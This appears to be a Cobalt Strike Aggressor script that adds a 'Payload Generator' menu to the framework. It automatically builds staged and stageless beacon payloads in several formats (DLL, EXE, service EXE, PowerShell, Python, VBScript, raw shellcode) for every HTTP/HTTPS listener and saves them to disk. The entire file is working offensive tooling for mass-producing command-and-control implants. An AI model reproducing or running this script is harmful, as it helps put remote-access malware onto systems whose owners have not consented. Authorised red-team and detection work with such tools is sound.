AggressorScripts/ArtifactPayloadGenerator.cna

#Automatic Artifact Payload Generator
#Author: @r3dQu1nn
#Generates every type of Stageless/Staged Payload based off a HTTP/HTTPS Listener

#Custom Directory for Payloads
mkdir("/opt/cobaltstrike/Staged_Payloads");
mkdir("/opt/cobaltstrike/Stageless_Payloads");

menubar("Payload Generator", "payloadgenerator", 2);
popup payloadgenerator {
	item "&Automatic Artifact Payload Generator" {
		prompt_confirm("Do you want to generate all the different types of Artifacts?", "Payload Generator Confirmation", {
			show_message("Generating Artifacts...");
			payloadgenerate();
		});
	}
}

sub payloadgenerate {
	foreach $name (listeners_local()) {
	$original_listener = $name;
        $listener_name = lc($name);
        if ($listener_name hasmatch "http" || $listener_name hasmatch "https") {
        	
        	#Staged Payloads
        	$data = artifact($original_listener, "dll");
        	$data1 = artifact($original_listener, "dllx64");
        	$data2 = artifact($original_listener, "exe");
        	$data3 = artifact($original_listener, "powershell");
        	$data4 = artifact($original_listener, "python");
        	$data5 = artifact($original_listener, "svcexe");
        	$data6 = artifact($original_listener, "vbscript");

        	#Write and Save Payloads
        	$handle = openf(">/opt/cobaltstrike/Staged_Payloads/dllpayload.dll");
		writeb($handle, $data);
		closef($handle);
		$handle1 = openf(">/opt/cobaltstrike/Staged_Payloads/dllx64payload.dll");
		writeb($handle1, $data1);
		closef($handle1);
		$handle2 = openf(">/opt/cobaltstrike/Staged_Payloads/exepayload.exe");
		writeb($handle2, $data2);
		closef($handle2);
		$handle3 = openf(">/opt/cobaltstrike/Staged_Payloads/powershellpayload.ps1");
		writeb($handle3, $data3);
		closef($handle3);
		$handle4 = openf(">/opt/cobaltstrike/Staged_Payloads/pythonpayload.py");
		writeb($handle4, $data4);
		closef($handle4);
		$handle5 = openf(">/opt/cobaltstrike/Staged_Payloads/svcexepayload.exe");
		writeb($handle5, $data5);
		closef($handle5);
		$handle6 = openf(">/opt/cobaltstrike/Staged_Payloads/vbspayload.vbs");
		writeb($handle6, $data6);
		closef($handle6);

		#Stageless Payloads
		artifact_stageless($original_listener, "dll", "x86", "", &dll);
        	artifact_stageless($original_listener, "dllx64", "x86", "", &dllx64);
        	artifact_stageless($original_listener, "exe", "x86", "", &exe);
        	artifact_stageless($original_listener, "powershell", "x86", "", &ps1);
        	artifact_stageless($original_listener, "raw", "x86", "", &raw);
        	artifact_stageless($original_listener, "svcexe", "x86", "", &svcexe);
        
		}
	}			
}

sub dll {

	#Write and Save Payload
	local('$cradle');
	$cradle = openf(">/opt/cobaltstrike/Stageless_Payloads/dllpayload.dll");
	writeb($cradle, $1);
	closef($cradle);

}

sub dllx64 {

	#Write and Save Payload
	local('$cradle1');
	$cradle1 = openf(">/opt/cobaltstrike/Stageless_Payloads/dllx64payload.dll");
	writeb($cradle1, $1);
	closef($cradle1);

}

sub exe {

	#Write and Save Payload
	local('$cradle2');
	$cradle2 = openf(">/opt/cobaltstrike/Stageless_Payloads/exepayload.exe");
	writeb($cradle2, $1);
	closef($cradle2);

}

sub ps1 {

	#Write and Save Payload
	local('$cradle3');
	$cradle3 = openf(">/opt/cobaltstrike/Stageless_Payloads/powershellpayload.ps1");
	writeb($cradle3, $1);
	closef($cradle3);

}

sub raw {

	#Write and Save Payload
	local('$cradle4');
	$cradle4 = openf(">/opt/cobaltstrike/Stageless_Payloads/rawpayload.bin");
	writeb($cradle4, $1);
	closef($cradle4);

}

sub svcexe {

	#Write and Save Payload
	local('$cradle5');
	$cradle5 = openf(">/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe");
	writeb($cradle5, $1);
	closef($cradle5);
	if (-exists "/opt/cobaltstrike/Stageless_Payloads/svcexepayload.exe") {
		show_message("All Staged and Stageless Payloads have been generated and saved.");
		show_message("Check /opt/cobaltstrike/Staged_Payloads/ and /opt/cobaltstrike/Stageless_Payloads/ for Artifacts.");
	}
}